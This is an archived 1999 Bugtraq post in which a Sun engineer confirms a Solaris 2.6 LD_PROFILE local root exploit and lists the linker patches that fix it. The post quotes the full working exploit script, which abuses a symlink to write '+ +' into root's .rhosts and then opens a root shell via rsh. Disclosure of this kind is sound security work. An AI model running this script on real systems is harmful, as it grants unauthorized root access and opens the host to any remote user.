Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: LD_PROFILE local root exploit for solaris 2.6

From: casper () HOLLAND SUN COM (Casper Dik)
Date: Fri, 24 Sep 1999 10:30:32 +0200


works on solaris 2.6 sparc anyway...

#! /bin/ksh
#  LD_PROFILE local root exploit for solaris
#  steve () tightrope demon co uk 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + >  /.rhosts
rsh -l root localhost csh -i


This is bug 4150646 (or rather, 1241843, which resurfaced after an
extensive rewrite of the dynamic linker)

It's been fixed in Solaris 7 and with the following patches in other
releases:

103242-07: SunOS 5.5: linker patch
103243-07: SunOS 5.5_x86: linker patch
103627-11: SunOS 5.5.1: Linker patch
103628-10: SunOS 5.5.1_x86: Linker patch
105490-07: SunOS 5.6: linker patch
105491-05: SunOS 5.6_x86: linker patch

The bug was originally fixed in 5.5.1 and back patched; I rediscovered that
it was back in 2.6 (which also meant it was in the process of being patched
back into 5.5/5.5.1, but I think those patches were held up until the
regression was fixed); this was all well before S7 was released.

The original bug was also fixed in the following patches:

102049-05: SunOS 5.4: linker fixes
102303-05: SunOS 5.4: POINT PATCH: linker fixes
102304-05: SunOS 5.4_x86: POINT PATCH: linker fixes
102778-03: SunOS 5.4_x86: linker patch

Casper
Previous By Date Next
Previous By Thread Next

Current thread: